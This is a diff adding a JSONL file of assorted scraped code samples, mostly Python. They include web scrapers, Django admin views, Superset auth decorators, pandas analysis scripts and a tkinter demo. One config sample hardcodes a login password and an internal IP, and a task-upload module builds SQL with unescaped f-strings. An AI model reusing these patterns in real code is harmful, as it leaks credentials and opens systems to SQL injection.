diff --git "a/4064.jsonl" "b/4064.jsonl" new file mode 100644--- /dev/null +++ "b/4064.jsonl" @@ -0,0 +1,616 @@ +{"seq_id":"228824175","text":"#This uses urlopen to access a site, then uses BeautifulSoup to get the\n#HTML from that site, and then cuts out all of the non-text\nimport re\nfrom bs4 import BeautifulSoup\nimport requests\n\nclass Professor:\n person = \"\"\n quality = \"\"\n takeAgain = \"\"\n difficulty = \"\"\n def __init__(self, name):\n self.person = name\n\ndef isPageGood(url):\n site = requests.get(url)\n soup = BeautifulSoup(site.content, \"html.parser\")\n zeroMatches = soup.find(\"div\", attrs ={\"class\" : \"zeromatches\"}) #if page is bad the find() will return \"

No course sections matched your search criteria.

Please try again using fewer or different search terms.

\"\n\n badString = '

No course sections matched your search criteria.

Please try again using fewer or different search terms.

'\n\n #tests to see if there is string denoting no results is in the page\n if badString in str(zeroMatches) :\n return False\n else:\n return True\n\ndef abSem(semester) : #abbreviates the semester value to get the whole term ----returns the one letter abbreviation\n if semester.lower() == \"fall\":\n return \"f\"\n elif semester.lower() == \"spring\":\n return \"s\"\n elif semester.lower() == \"summer\":\n return \"u\"\n else :\n return \"And the Lord spake, saying, 'First shalt thou take out the Holy Pin. Then, shalt thou count to three, no more, no less. Three shall be the number thou shalt count, and the number of the counting shall be three. Four shalt thou not count, nor either count thou two, excepting that thou then proceed to three. Five is right out! Once the number three, being the third number, be reached, then lobbest thou thy Holy Hand Grenade of Antioch towards thou foe, who being naughty in my sight, shall snuff it.'\"\n\ndef createURL(prefix,year,semester,number) : #navigates to the coursebook page with the search criteria and returns creates a list of all the professors\n term = str(year%100) + abSem(semester=semester)\n url = \"https://coursebook.utdallas.edu/search/searchresults\" + \"/\" + prefix + str(number) + \"/term_\" + term\n\n return url\n\ndef scrapeProf(url) : #navigates to the coursebook page with the search criteria and returns creates a list of all the professors\n site = requests.get(url)\n soup = BeautifulSoup(site.content, \"html.parser\")\n professorList = soup.find_all(\"a\", title=True, attrs ={\"class\" : \"ptools-popover\"})\n\n i = 0\n while i < len(professorList): #changes the professor list full of jank into just the names\n professorList[i] = professorList[i].get_text()\n if (professorList[i].count(\" \") + 1) >= 2 : #if wordcount >=2\n professorList[i] = professorList[i].split()[0] + \" \" + professorList[i].split()[-1]\n i = i + 1\n return professorList\n\ndef getRating(name):\n\n name = re.sub('\\s','+',name)\n professor = Professor(name)\n #Initial Search for the Professor\n URL = \"https://www.ratemyprofessors.com/search.jsp?queryoption=HEADER&queryBy=teacherName&schoolName=The+University+of+Texas+at+Dallas&schoolID=1273&query=\" + name\n site = requests.get(URL)\n soup = BeautifulSoup(site.content, 'html.parser')\n search = soup.find(\"a\", href=re.compile(\"ShowRatings\"))\n \n if str(search) == \"None\":\n professor.quality = \"0\"\n professor.takeAgain = \"0\"\n professor.difficulty = \"0\"\n print(\"Professor was not found\")\n else:\n\n URL = \"https://www.ratemyprofessors.com\" + search.get('href') # new link\n \n \n #Get Number from the actual professor page.\n site = requests.get(URL)\n soup = BeautifulSoup(site.content, 'html.parser')\n search = soup.find_all('div', attrs={'class':'grade'})\n\n if len(search) == 3:\n \n quality = search[0].get_text()\n takeAgain = search[1].get_text()\n difficulty = search[2].get_text()\n\n professor.quality = re.sub('\\s+','',quality)\n professor.takeAgain = re.sub('\\s+','',takeAgain)\n professor.difficulty = re.sub('\\s+','',difficulty)\n\n else:\n\n professor.quality = \"0\"\n professor.takeAgain = \"0\"\n professor.difficulty = \"0\"\n\n\n return professor\n\ndef getRatingList(professorList):\n index = 0\n ratingList = []\n for professor in professorList:\n name = professorList[index]\n ratingList.append(getRating(name))\n index += 1\n return ratingList\n\n\ndef compProf(ratingList):\n index = 0\n bestIndex = 0\n bestQuality = 0.0\n\n for professor in ratingList:\n string = ratingList[index].quality\n quality = float(string)\n if quality > bestQuality:\n bestQuality = quality\n bestIndex = index\n index += 1\n \n return ratingList[bestIndex]\n\n\ndef bestProfessor(coursePrefix, courseNum, semester, year):\n searchUrl = createURL(coursePrefix, year, semester, courseNum)\n if isPageGood(searchUrl):\n professor = compProf(getRatingList(scrapeProf(searchUrl)))\n print(professor.person)\n print(professor.quality)\n print(professor.difficulty)\n print(professor.takeAgain)\n return \n else:\n return None\n\nbestProfessor(\"cs\", 6301, \"spring\", 2020)\n\n#absem\n#create url\n#scrap prof to array\n#for each prof in array get rating and output to new array\n#find top prof and return prof\n","sub_path":"Payton Testing/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":5444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"89822978","text":"import pytest\nfrom hypothesis import given\n\nfrom janitor.testing_utils.strategies import df_strategy\n\n\n@pytest.mark.functions\n@given(df=df_strategy())\ndef test_reorder_columns(df):\n # NOTE: This test essentially has four different tests underneath it.\n # WE should be able to refactor this using pytest.mark.parametrize.\n\n # sanity checking of inputs\n\n # input is not a list or pd.Index\n with pytest.raises(TypeError):\n df.reorder_columns(\"a\")\n\n # one of the columns is not present in the DataFrame\n with pytest.raises(IndexError):\n df.reorder_columns([\"notpresent\"])\n\n # reordering functionality\n\n # sanity check when desired order matches current order\n # this also tests whether the function can take Pandas Index objects\n assert all(df.reorder_columns(df.columns).columns == df.columns)\n\n # when columns are list & not all columns of DataFrame are included\n assert all(\n df.reorder_columns([\"animals@#$%^\", \"Bell__Chart\"]).columns\n == [\"animals@#$%^\", \"Bell__Chart\", \"a\", \"decorated-elephant\", \"cities\"]\n )\n","sub_path":"tests/functions/test_reorder_columns.py","file_name":"test_reorder_columns.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"29977213","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport socket \n\ndef get_host():\n\treturn socket.gethostbyname(socket.gethostname())\n\n\n# 本设备IP\n# LOCAL_MACHINE_IP = get_host()\nLOCAL_MACHINE_IP = '10.1.1.20'\n\n# 设备名 (用于告诉用户哪台设备接单执行打包任务)\nMACHINE_NAME = 'MacPro'\n\n# 本地登录用户名\nLOCAL_USERNAME = 'babybus'\n\n# 本地登录用户密码\nLOCAL_PASSWORD = 'team123456'\n\n# 打包系统代码逻辑路径\nSITES_DIR = r'/Users/babybus/Sites'\n\n# 模板插件等代码资源路径\nSITE_DIR = r'/Volumes/BABYBUS_2D/Site'\n\n# 打包数据缓存和公共资源等路径\nMEDIA_DIR = r'/Volumes/BabyBusData/htdocs/media'\n\n\n# APP打包资源缓存路径\nTEMP_DIR = os.path.join(MEDIA_DIR, 'temp')\n\n# 用于存放对比的音效资源\nSND_SOURCE_DIR = os.path.join(MEDIA_DIR, 'sndsource')\n\n# 用于存放不同功能的lua模板的路径(2.x框架)\nPROJECT_TOOL_DIR = os.path.join(SITE_DIR, 'project_tool')\n\n# 用于存放不同功能的lua模板的路径(3.x框架)\nTHREE_TOOL_DIR = os.path.join(SITE_DIR, 'three_tool')\n\n# 用于存放安卓和IOS模板的路径\nSOURCE_DIR = os.path.join(SITE_DIR, 'source')\n\n# 用于获取IOS打包模板的路径\nIPAPACK_DIR = os.path.join(SOURCE_DIR, 'ipapack')\n\n# 用于反馈到网站打包日志的路径\nMEDIA_PORT = os.path.join(LOCAL_MACHINE_IP, 'media')\n\n# 网站上传的公共资源路径 \nCOMMON_RES_DIR = os.path.join(SITES_DIR, 'media', 'common')\n\n\n# add a005 a030 等渠道统一处理\nSAME_CHANNEL = ['A005', 'A030']\n","sub_path":"quick/python/django/pack/auxiliary/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"388876041","text":"# -*- coding: utf-8 -*-\n\nfrom apps.gift.models import Category, Subcategory, Gift, Brand,\\\n GlobalPriceModif\nfrom apps.gift.forms import SubcategoryForm, CategoryForm, GiftForm,\\\n AddNewThumb, BrandForm, GlobalPriceModifForm\nfrom kay.utils import render_to_response\nfrom kay.auth.decorators import admin_required\nfrom kay.lib.werkzeug.utils import redirect\nfrom apps.img.models import ThumbImage\nfrom kay.utils.paginator import Paginator, InvalidPage, EmptyPage\n\n\n@admin_required\ndef all(request):\n gifts_list = Gift.all()\n paginator = Paginator(gifts_list, 26)\n try:\n page = int(request.args.get('page',1))\n except ValueError:\n page = 1\n\n try:\n gifts = paginator.page(page)\n except (EmptyPage, InvalidPage):\n gifts = paginator.page(paginator.num_pages())\n\n return render_to_response('gift/admin/all.html', {'gifts':gifts})\n\n@admin_required\ndef delete(request, key):\n gift = Gift.get(key)\n if gift:\n gift.delete()\n return redirect('/gift/admin/all/')\n\n\n@admin_required\ndef add(request):\n tmp_gift = Gift()\n form = GiftForm(instance=tmp_gift)\n if request.method == 'POST' and form.validate(request.form):\n gift = form.save()\n return redirect('/gift/admin/edit/%s/' % gift.key())\n return render_to_response('gift/admin/add.html', {'form':form.as_widget()})\n\n@admin_required\ndef edit(request, key):\n ret_url = request.values.get('ret_url', '')\n gift = Gift.get(key)\n if gift is None:\n return redirect('/gift/admin/all/')\n edit_form = GiftForm(instance=gift)\n if request.method == 'POST' and edit_form.validate(request.form):\n edit_form.save()\n if ret_url:\n return redirect(ret_url)\n return redirect('/gift/admin/all/')\n add_new_thumb_form = AddNewThumb()\n return render_to_response('gift/admin/edit.html',\n {'edit_form':edit_form.as_widget(),\n 'gift':gift,\n 'add_new_thumb_form':add_new_thumb_form.as_widget()})\n\n@admin_required\ndef brands(request):\n form = BrandForm()\n if request.method == \"POST\":\n if form.validate(request.form):\n form.save()\n form = BrandForm()\n return render_to_response('gift/admin/brands.html',\n {'form':form.as_widget(), 'brands':Brand.all()})\n\n@admin_required\ndef brand_edit(request, key):\n brand = Brand.get(key)\n if brand is None:\n return redirect('/gift/admin/brands/')\n form = BrandForm(instance=brand)\n if request.method == 'POST' and form.validate(request.form):\n form.save()\n return redirect('/gift/admin/brands/')\n return render_to_response('gift/admin/brand_edit.html', {'form':form.as_widget()})\n\n@admin_required\ndef categories(request):\n form = CategoryForm()\n if request.method == 'POST':\n if form.validate(request.form):\n form.save()\n form = CategoryForm()\n return render_to_response('gift/admin/category.html',\n {'form':form.as_widget(),\n 'categories':Category.all().order('category')})\n\n@admin_required\ndef subcategories(request):\n form = SubcategoryForm()\n if request.method == 'POST':\n if form.validate(request.form):\n form.save()\n form = SubcategoryForm()\n return render_to_response('gift/admin/subcategories.html',\n {'form':form.as_widget(),\n 'subcategories':Subcategory.all()\\\n .order('on_category').order('subcategory')})\n\n@admin_required\ndef global_price_modif(request):\n form = GlobalPriceModifForm()\n if request.method == 'POST':\n if form.validate(request.form):\n objs = GlobalPriceModif.all()\n if objs.count() > 0:\n gpm = objs[0]\n gpm.price_percent = form['price_percent']\n gpm.put()\n return redirect('/gift/admin/global_price_modif')\n else:\n form.save()\n form = GlobalPriceModifForm()\n return render_to_response('gift/admin/global_price_modif.html',\n {'form':form.as_widget(),\n 'global_price_modif':GlobalPriceModif.all()})\n\n@admin_required\ndef delete_brand(request, key):\n brand = Brand.get(key)\n if brand:\n brand.delete()\n return redirect('/gift/admin/brands/')\n\n@admin_required\ndef delete_category(request, key):\n category = Category.get(key)\n if category:\n category.delete()\n return redirect('/gift/admin/categories/')\n\n@admin_required\ndef delete_subcategory(request, key):\n subcategory = Subcategory.get(key)\n if subcategory:\n subcategory.delete()\n return redirect('/gift/admin/subcategories/')\n\n@admin_required\ndef add_new_thumb(request):\n if request.method == 'POST':\n gift_key = request.values.get('gift_key')\n gift = Gift.get(gift_key)\n if gift is None:\n return redirect('/gift/admin/edit/%s/' % gift_key)\n\n new_th_form = AddNewThumb()\n if request.form and new_th_form.validate(request.form, request.files):\n thumb = new_th_form['img']\n content_type = 'image/jpeg'\n if gift.name:\n title = gift.name.replace('\"', '"')\n else:\n title = ''\n thumb_img = ThumbImage()\n thumb_img.add_new_thumb(blob_img=thumb, thumb_size=(700, 700, ),\n title=title, content_type=content_type)\n thumb_img.add_new_thumb(blob_img=thumb, thumb_size=(400, 400, ),\n title=title, content_type=content_type)\n thumb_img.add_new_thumb(blob_img=thumb, thumb_size=(200, 200, ),\n title=title, content_type=content_type)\n thumb_img.add_new_thumb(blob_img=thumb, thumb_size=(100, 100, ),\n title=title, content_type=content_type)\n if not gift.thumbs.count():\n thumb_img.main_gift = gift\n thumb_img.gift = gift\n thumb_img.put()\n\n return redirect('/gift/admin/edit/%s/' % gift_key)\n return redirect('/gift/admin/all/')\n\n@admin_required\ndef set_default_thumb(request, gift, key):\n thumb = ThumbImage.get(key)\n if thumb:\n gift_obj = Gift.get(gift)\n if gift_obj:\n if gift_obj.main_thumb.count():\n for old_thumb in gift_obj.main_thumb:\n old_thumb.main_gift = None\n old_thumb.put()\n thumb.main_gift = gift_obj\n thumb.put()\n return redirect('/gift/admin/edit/%s/' % gift)\n\n@admin_required\ndef delete_thumb(request, thumb_key):\n thumb = ThumbImage.get(thumb_key)\n if thumb:\n gift = thumb.gift\n thumb.delete()\n if gift.thumbs.count() and not gift.main_thumb.count():\n tmp_thumb = gift.thumbs[0]\n tmp_thumb.main_gift = gift\n tmp_thumb.put()\n return redirect('/gift/admin/edit/%s/' % gift.key())\n return redirect('/admin/view_all/')\n\n\n","sub_path":"apps/gift/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"197968685","text":"import functools\nfrom flask import g, request\nfrom flask_jwt_extended import verify_jwt_in_request\nfrom flask_appbuilder.security.decorators import has_access\nimport simplejson as json\nfrom superset import security_manager\nfrom superset.peak import authorizer\n\ndef has_superset_api_access(f):\n \"\"\"\n Use this decorator for REST APIs in order to authenticate via superset generated\n access_token. It will enable granular security permissions to your methods.\n Permissions will be associated to a role, and roles are associated to users.\n\n By default the permission's name is the methods name.\n \"\"\"\n def wraps(self, *args, **kwargs):\n try:\n if request.headers.get('Authorization') is not None:\n verify_jwt_in_request()\n return f(self, *args, **kwargs)\n elif g.user is not None and g.user.is_authenticated:\n has_access(f)\n return f(self, *args, **kwargs)\n else:\n raise Exception('Login is valid only through \"authToken\"')\n except Exception as e:\n raise e\n return functools.update_wrapper(wraps, f)\n\ndef check_access_and_create_session(f):\n \"\"\"\n Use this decorator to enable granular security permissions to your methods\n and for login user using sessions. Permissions will be associated to a role,\n and roles are associated to users.\n\n By default the permission's name is the methods name.\n \"\"\"\n def wraps(self, *args, **kwargs):\n try:\n form_data = request.args.get('form_data')\n if form_data is None:\n form_data = \"{}\"\n auth_token = json.loads(form_data).get(\"token\")\n authorization_header = request.headers.get('Authorization')\n\n if (authorization_header is not None or auth_token is not None):\n token = authorization_header\n if token is None:\n token = \"Bearer \" + auth_token\n authorizer.authorize(token, security_manager)\n return f(self, *args, **kwargs)\n elif g.user is not None and g.user.is_authenticated:\n has_access(f)\n return f(self, *args, **kwargs)\n else:\n raise Exception('Login is valid only through \"authToken\"')\n except Exception as e:\n raise e\n return functools.update_wrapper(wraps, f)\n","sub_path":"superset/peak/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"7457954","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sys\nimport re\nimport math\nimport scipy.stats as stats\n\n\n# sys.argv[1] : csv file to extract columns from\n\n\ndata = pd.read_csv(sys.argv[1], sep=',', engine=\"python\")\ndata = data[data.RBPome != 'Contaminant']\ndata = data.fillna('-')\n\ntot_pfam = list()\n\nfor i in range(len(data)):\n a = list()\n pfam = data.iloc[i]['Cross-reference_(Pfam)']\n pfam = pfam.split(';')\n\n for j in range(len(pfam)):\n if pfam[j][:2] == 'PF':\n a.append(pfam[j])\n\n a = list(set(a))\n\n for j in range(len(a)):\n tot_pfam.append(a[j])\n\nprint(len(tot_pfam))\n\nnew = pd.DataFrame({'pfam': tot_pfam})\nnew['RBD_classification'] = ''\nnew['name'] = ''\n\npfam_dom = pd.read_csv(sys.argv[2], sep=',', engine='python')\n\ndic_class = pfam_dom[['id', 'RBD.classification']]\ndic_class = dic_class.set_index('id').T.to_dict('list')\n\ndic_name = pfam_dom[['id', 'name']]\ndic_name = dic_name.set_index('id').T.to_dict('list')\n\nfor i in range(len(new)):\n new.at[i, 'RBD_classification'] = str(dic_class.get(new.iloc[i]['pfam']))[2:-2]\n new.at[i, 'name'] = str(dic_name.get(new.iloc[i]['pfam']))[2:-2]\n\n\nnew.to_csv('sample_pfam_with_class.csv', index=None)\n\n# sorting out classical RBD\n\n\nclassical = new[new.RBD_classification == 'classical']\n\na = classical['name'].value_counts()\na = a.to_frame()\na['id'] = a.index\na.index = range(len(a))\n\nkh_counter = 0\n\nclassical = pd.DataFrame()\nclassical['count'] = ''\nclassical['name'] = ''\n\nfor i in range(len(a)):\n if str(a.iloc[i]['id'])[:3] == \"KH_\":\n kh_counter = kh_counter + int(a.iloc[i]['name'])\n \n else:\n classical.at[i, 'name'] = a.iloc[i]['id']\n classical.at[i, 'count'] = a.iloc[i]['name']\n\nclassical.index = range(len(classical))\nclassical.at[len(classical), 'name'] = 'KH'\nclassical.at[len(classical)-1, 'count'] = kh_counter\n\n# sorting out non classical RBD\n\n\nnonclassical = new[new.RBD_classification == 'nonclassical']\n\nb = nonclassical['name'].value_counts()\nb = b.to_frame()\nb['id'] = b.index\nb.index = range(len(b))\n\nribosome_counter = 0\n\nnonclassical = pd.DataFrame()\nnonclassical['count'] = ''\nnonclassical['name'] = ''\n\nfor i in range(len(b)):\n if str(b.iloc[i]['id'])[:9] == 'Ribosomal':\n ribosome_counter = ribosome_counter + int(b.iloc[i]['name'])\n\n else:\n nonclassical.at[i, 'name'] = b.iloc[i]['id']\n nonclassical.at[i, 'count'] = b.iloc[i]['name']\n\nnonclassical.index = range(len(nonclassical))\nnonclassical.at[len(nonclassical), 'name'] = 'Ribosomal'\nnonclassical.at[len(nonclassical)-1, 'count'] = ribosome_counter\n\n\nnone = new[new.RBD_classification == 'none']\n\nc = none['name'].value_counts()\nc = c.to_frame()\nc['id'] = c.index\nc.index = range(len(c))\n\nrna_c = 0\nppr_c = 0\nfad_c = 0\n\nnone = pd.DataFrame()\nnone['count'] = ''\nnone['name'] = ''\n\nfor i in range(len(c)):\n if str(c.iloc[i]['id'])[:11] == 'RNA_pol_Rpb':\n rna_c = rna_c + int(c.iloc[i]['name'])\n\n elif str(c.iloc[i]['id'])[:4] == 'PPR_':\n ppr_c = ppr_c + int(c.iloc[i]['name'])\n\n elif str(c.iloc[i]['id'])[:12] == 'FAD_binding_':\n fad_c = fad_c + int(c.iloc[i]['name'])\n\n else:\n none.at[i, 'name'] = c.iloc[i]['id']\n none.at[i, 'count'] = c.iloc[i]['name']\n\nnone.index = range(len(none))\nnone.at[len(none), 'name'] = 'RNA_pol_Rpb'\nnone.at[len(none)-1, 'count'] = rna_c\n\nnone.at[len(none), 'name'] = 'PPR_none'\nnone.at[len(none)-1, 'count'] = ppr_c\n\nnone.at[len(none), 'name'] = 'FAD_binding'\nnone.at[len(none)-1, 'count'] = fad_c\n\nrandom = new[new.RBD_classification == '']\n\n\nclassical.to_csv('classical_rbp.csv', index=None)\nnonclassical.to_csv('nonclassical_rbp.csv', index=None)\nnone.to_csv('none_rbp.csv', index=None)\nrandom.to_csv('no_entry.csv', index=None)\n\n\n\nd = random['RBD_classification'].value_counts()\n\n\n\n\n'''\na.to_csv('classical_rbp.csv')\nb.to_csv('nonclassical_rbp.csv')\nc.to_csv('none.csv')\nd.to_csv('random.csv')\n'''\n\n\n\n'''\nnone = occ[['none'][0]]\n\nclassical = occ[['classical'][0]]\nnonclassical = occ[['nonclassical'][0]]\n\nbar_chart = [classical, nonclassical, none]\n\nfig, ax = plt.subplots(figsize=(10,7))\n\ncolors = [\"#006D2C\", \"#31A354\",\"#74C476\"]\n\nocc.plot.bar(stacked = True, colors = colors)\n'''\n\n\n'''\nfig = plt.figure(facecolor='white')\n\nax = fig.add_subplot(1,1,1)\nbar_width = 0.5\nbar_1 = np.arrange(1,4)\n\nax1 = ax.bar(bar_1, bar_chart, width = bar_width, label = 'A', \n\n'''\n'''\ndata['odds_ratio'] = ''\ndata['log2_odds_ratio'] = ''\n\ndata.index = range(len(data))\n\nfor i in range(len(data)):\n\n print(i)\n print('-----------------')\n print(data.iloc[i]['name'])\n print('-----------------')\n\n# if data.iloc[i]['# GO'] == 'GO:0004673':\n# print(data[[i]])\n\n\n\n study = data.iloc[i]['ratio_in_study']\n pop = data.iloc[i]['ratio_in_pop']\n\n study = study.split('/')\n pop = pop.split('/')\n study = list(map(float, study))\n pop = list(map(float, pop))\n odds_ratio = (study[0]/study[1])/(pop[0]/pop[1])\n\n if odds_ratio != 0:\n log2_odds_ratio = math.log2(odds_ratio)\n data.at[i, 'odds_ratio'] = str(odds_ratio)\n data.at[i, 'log2_odds_ratio'] = str(log2_odds_ratio)\n\n\n elif odds_ratio == 0:\n log2_odds_ratio = 'error'\n\n\n# print(odds_ratio)\n# print(log2_odds_ratio)\n# print('data frame before: ',repr(new.iloc[i]['odds_ratio']))\n# print('or: ',repr(odds_ratio))\n# print('log2: ',log2_odds_ratio)\n\n# print('data frame after: ', new.iloc[i]['odds_ratio'])\n\n# print(data.iloc[i]['name'], ' has odds_ratio: ', odds_ratio)\n\ndata.to_csv('at_GO_enrichment_no_propagate_odds_ratio.csv', index=None)\n\n\n'''\n\n\n\n\n'''\nnew = pd.DataFrame(columns=['Entry'])\nnew['Entry'] = ''\n\nsample_list = list()\nempty = list()\nempty_counter = 0\n\nfor i in range(len(data)):\n if i%1000 == 0:\n print(str(i) + '/' + str(len(data)))\n\n prot_groups = data.iloc[i]['Entry']\n prot_groups = prot_groups.split(';')\n \n for l in range(len(prot_groups)):\n if prot_groups[l] != '-':\n sample_list.append(prot_groups[l])\n \n\n elif prot_groups[l] == '-':\n empty.append(str(data.iloc[i]['Majority.protein.IDs']))\n empty_counter += 1\n\n\n\n# go = data.iloc[i]['Gene_ontology_(molecular_function)']\n# go = go.split(';')\n# go_new = list()\n# for j in range(len(go)):\n# if go[j][1:3] == 'GO':\n# go_new.append(go[j][1:-1])\n\n# if len(go_new) != 0: \n# new.at[i, 'Gene_ontology_(molecular_function)'] = go_new\n\n\nprint('these groups did not have an identifier: ' + str(empty))\nprint('they were : ' + str(empty_counter) + ' in total')\n\nsamples = list(set(sample_list))\n\nthefile = open('at_sample_proteins.csv', 'w')\nfor item in samples:\n thefile.write(\"%s\\n\" % item)\n\nprint(len(sample_list))\nprint(len(samples))\n\n#new.to_csv('at_sample_prot_file.csv', sep='\\t', index=None, header=False)\n'''\n","sub_path":"pfam_domain_distribution.py","file_name":"pfam_domain_distribution.py","file_ext":"py","file_size_in_byte":6913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"653198422","text":"from models.config import connection\n\n\ndef insert_task(grade, day, hour, date, descr):\n curr_id = get_current_task_id()\n with connection.cursor() as cursor:\n query = f\"insert into task values (Null, '{grade}', {day}, '{hour}', '{date}', '{descr}');\"\n cursor.execute(query)\n connection.commit()\n print(\"inserted\")\n insert_student_task(grade, curr_id)\n\n\ndef get_current_task_id():\n with connection.cursor() as cursor:\n query = \"SELECT `AUTO_INCREMENT` FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'homeschooldb' AND TABLE_NAME = 'task';\"\n cursor.execute(query)\n result = cursor.fetchall()\n print(result)\n return result[0]['AUTO_INCREMENT']\n\n\ndef get_tasks_by_class_and_date(class_, date):\n with connection.cursor() as cursor:\n query = \"select homework from lesson where class = '{}' and date = {}\".format(class_, date)\n cursor.execute(query)\n tasks = cursor.fetchall()\n return tasks\n\n\ndef get_all_students(class_):\n with connection.cursor() as cursor:\n query = f\"select name_ from student where class = '{class_}'\"\n cursor.execute(query)\n students = cursor.fetchall()\n return students\n\n\ndef insert_student_task(class_, task_id):\n students = get_all_students(class_)\n with connection.cursor() as cursor:\n for student in students:\n query = f\"insert into student_task values('{student['name_']}', {task_id}, 0)\"\n cursor.execute(query)\n connection.commit()\n print(\"insert students\")\n","sub_path":"models/upload_task_model.py","file_name":"upload_task_model.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"314118231","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.views.generic import TemplateView\nfrom django.views.generic import ListView\nfrom django.views.generic import DetailView\nfrom el_pagination.views import AjaxListView\n\nfrom gitensite.apps.bookrepos.models import BookRepo\nfrom gitensite.apps.bookinfo.models import Book\n\nclass HomePageView(TemplateView):\n template_name = 'home.html'\n\n def get_context_data(self, **kwargs):\n context = super(HomePageView, self).get_context_data(**kwargs)\n return context\n\nclass NewsletterView(TemplateView):\n\n def get_template_names(self, **kwargs):\n return ['newsletters/{issue}.html'.format(\n issue=str(self.kwargs['issue'])\n )]\n\nclass SearchView(AjaxListView):\n model = Book\n template_name = 'book_list.html'\n page_template = 'book_list_page.html'\n\n def get_context_data(self, **kwargs):\n context = super(SearchView, self).get_context_data(**kwargs)\n\n return context\n\n def get_queryset(self):\n if self.request.GET.has_key('q'):\n return super(AjaxListView,self).get_queryset().filter(title__icontains=self.request.GET['q'])\n else:\n return super(AjaxListView,self).get_queryset()\n","sub_path":"gitensite/apps/content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"638801554","text":"#!/usr/bin/python\nimport os\nimport shutil\nimport tkinter as tk\n\ngui = tk.Tk()\n\ngui.text = tk.StringVar()\ngui.text.set(\"Click the \\\"Execute Fix\\\" to continue...\")\n\n\ndef getmodfolder():\n return (\n os.path.dirname(\n os.getenv('APPDATA')\n ) + \"\\\\Local\\\\Introversion\\\\Prison Architect\\\\mods\\\\2611379081\"\n )\n\n\ndef copytree(src, dst, symlinks=False, ignore=None):\n for item in os.listdir(src):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s):\n shutil.copytree(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n\ndef center(win):\n win.update_idletasks()\n width = win.winfo_width()\n height = win.winfo_height()\n x = (win.winfo_screenwidth() // 2) - (width // 2)\n y = (win.winfo_screenheight() // 2) - (height // 2)\n win.geometry('{}x{}+{}+{}'.format(width, height, x, y))\n\n\nnewDir = os.path.dirname(\n os.getenv('APPDATA')\n ) + \"\\\\Local\\\\Introversion\\\\Prison Architect\\\\mods\\\\CTM_Mod_Fixed\"\n\n\ndef callback():\n gui.text.set(\"Fixing mod...\")\n if os.path.isdir(getmodfolder()) and not os.path.exists(newDir):\n # Found the mod folder\n os.makedirs(newDir)\n copytree(getmodfolder(), newDir)\n\n # Now, we're going to open the manifest and delete the FileID.\n manifest = open(newDir + \"/\" + \"manifest.txt\")\n lines = manifest.readlines()\n # Close the file.\n manifest.close()\n # Reopen in write mode\n manifest = open(newDir + \"/\" + \"manifest.txt\", \"w\")\n for line in lines:\n if line != \"FileID F261379081\"+\"\\n\":\n if \"Name\" in line:\n manifest.write(\"Name \\\"CTM Fixed\\\"\" + \"\\n\")\n else:\n manifest.write(line)\n # And close it once more\n manifest.close()\n gui.text.set(\"Fix complete!\")\n else:\n if not os.path.isdir(getmodfolder()):\n gui.text.set(\"Unable to locate mod folder. Are you subscribed to CTM?\")\n else:\n gui.text.set(\"You already applied the fix!\")\n\n\ndef close():\n gui.quit()\n\ngui.geometry(\"375x25\")\ngui.wm_title(\"Creative Grant Mod Fixer\")\ncenter(gui)\n\n# Now, we're going to add our widgets...\nbtn_1 = tk.Button(gui, text=\"Execute Fix\", command=callback).pack(side=\"left\")\nbtn_2 = tk.Button(gui, text=\"Close\", command=close).pack(side=\"left\")\n\nlbl_1 = tk.Label(gui, textvariable=gui.text).pack()\n\ngui.mainloop()","sub_path":"out/CTMFixer.py","file_name":"CTMFixer.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"314033244","text":"import hailtop.batch as hb \n\nbackend = hb.ServiceBackend(\n billing_project='leonhardgruenschloss-trial',\n bucket='leo-tmp-au')\n\nb = hb.Batch(backend=backend, name='inner') \n\nj = b.new_job(name='hello') \nj.command('echo \"hello world\"') \n\nb.run()\n","sub_path":"inner.py","file_name":"inner.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444970995","text":"#!/usr/bin/python\r\n\r\n# Comment start with #\r\n# No multiple line comment\r\n\r\n##-----------------------------------------------------------------------------\r\n# Access options (Button=btnName)\r\n# btnName['state']=DISABLE/NORMAL\r\n# btnName['text']=\"Name of Button\"\r\n\r\n\r\n\r\nimport tkinter as tk\r\nfrom tkinter import messagebox as msgBox #import tkMessageBox\r\n\r\ntop = tk.Tk()\r\ntop.title('Button widget')\r\ntop.geometry('400x200')\r\n\r\ndef helloCallBack():\r\n msgBox.showinfo (\"Title Python\", \"Message : Hello\")\r\n print ('state : ', btnHello['state'])\r\n print ('text :', btnHello['text'])\r\n\r\ndef InfoCallBack():\r\n msgBox.showinfo (\"Information\", \"This is info Only\")\r\n\r\ncolorBG = \"#0000f0\" # notice color must be 6 hex digits (#123abc)\r\nbtnHello = tk.Button (top, text = \"Hello\", command = helloCallBack, fg=\"gray\", highlightcolor=\"red\")\r\n#btnInfo = 